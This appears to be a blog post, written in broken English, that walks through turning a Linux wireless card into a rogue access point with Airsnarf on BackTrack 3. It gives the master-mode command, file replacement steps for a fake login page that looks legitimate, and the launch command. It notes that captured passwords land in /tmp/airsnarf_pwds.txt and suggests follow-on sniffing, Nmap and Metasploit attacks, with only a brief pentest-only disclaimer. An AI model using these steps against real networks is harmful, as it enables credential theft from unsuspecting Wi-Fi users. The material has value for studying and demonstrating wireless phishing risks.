AIRSNARF

Airsnarf-The Rogue Access-Point(BackTrack 3 As Fake AP)

Most probably you people wont be trsuting the point that a Linux machine can act as a Access-point but its true.Atheros chipset based cards can act as Access-point or Master mode.for checking that your card support to act as an AP.I have tested it on Backtrack3 final.Using Netgear WG311T A/G/N AR 2414 Chipset
(patched madwifi-ng drivers) with 7 dbi Antenna & Linksys WUSB54GC (RT73 chipset).Netgear PCI Card I made as Rogue AP & Through my other card I Scanned the avaliable AP and got the Rogue Ap Working in OPN Authentication mode.voila
use this command to verify your card about Airsnarf specifications:-
wlanconfig ath0 create wlandev wifi0 wlanmode master/ap    #use either master or ap
this command makes an WIRELSS NIC acting as AP.
I have attached a custom coded file which makes airsnarf a truly immersive Legitimate looking AP.download it and Unzip it.DOWNLOAD
#replace  the file  airsnarf.cfg with /pentest/wireless/airsnarf-0.2/cfg/airsnarf.cfg
#For wireless interace I would recommend Atheros Chipset based cards as the airsnarf
tries to make NIC card as Access point which is possible using MADWIFI-NG drivers only
and those are atheros based chipset.
#place dhcpd.src /pentest/wireless/airsnarf-0.2/bin
#replace airsnarf.cgi with /pentest/wireless/airsnarf-0.2/cfg/cgi-bin/airsnarf.cgi
#replace my index.html in path /pentest/wireless/airsnarf-0.2/cfg/html & /var/www/htdocs
#replace airsnarf.jpg with my airsnarf.jpg in /pentest/wireless/airsnarf-0.2/cfg/html & /var/www/htdocs
#copy apache_pb22_ani.gif from /var/www/htdocs & paste in /pentest/wireless/airsnarf-0.2/cfg/html.
#that is all we have done.made a legally looking webpage for login.
#cd /pentest/wireless/airsnarf-0.2 airsnarf0.2
#./airsnarf
(paswords will be store in /tmp/airsnarf_pwds.txt)

Setting the ROGUE AP name as Wifi0wn & DHCP Network ID And Router IP.
Starting the Airsnarf Script to Work As Rogue AP.Great tool for showing the vulnerabilites in Windows Connection manager.
With my another USB Wireless NIC linksys WUSB54GC I am scanning the avaliable network.where I can see my fake AP is Also getting work by name wifi0wn with open authentication,54 Mbps and on channel 1.
now with my other card I am trying to get an IP from wifi0wn and connect without any key.
You can see that ath0 is working as an Access-point having random MAC ID and my rausb0/linksys adapter got connected with Rogue AP.
In ifconfig we can see that rausb0 got IP address from the ROGUE DHCP Server of Airsnarf
Now when you will surf you will get such login-page which is totally legitimate look.thanks to me to code it and redirecting it.
Redirection of url after hacking username & Password.
Default location of password is /tmp/airsnarf_pwds.txt.
List of username along with passwords
This tool is still in progress.I am making it to work more worsely like redirecting to some website,XSS.use it for social-engineering and vulnerability assessment test.now you can show that anaware user can connect to fakeAP without their knowledge and which can leads to compromise their data.once connecting with AP now you can run the Nmap Scan along with Metapsloit Framework,sniffers like wireshark for getting HTTP,HTTPS,FTP,TELNET Passwords & Many more sofisticated attacks.(USE FOR PT & VA Only)
Posted by

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)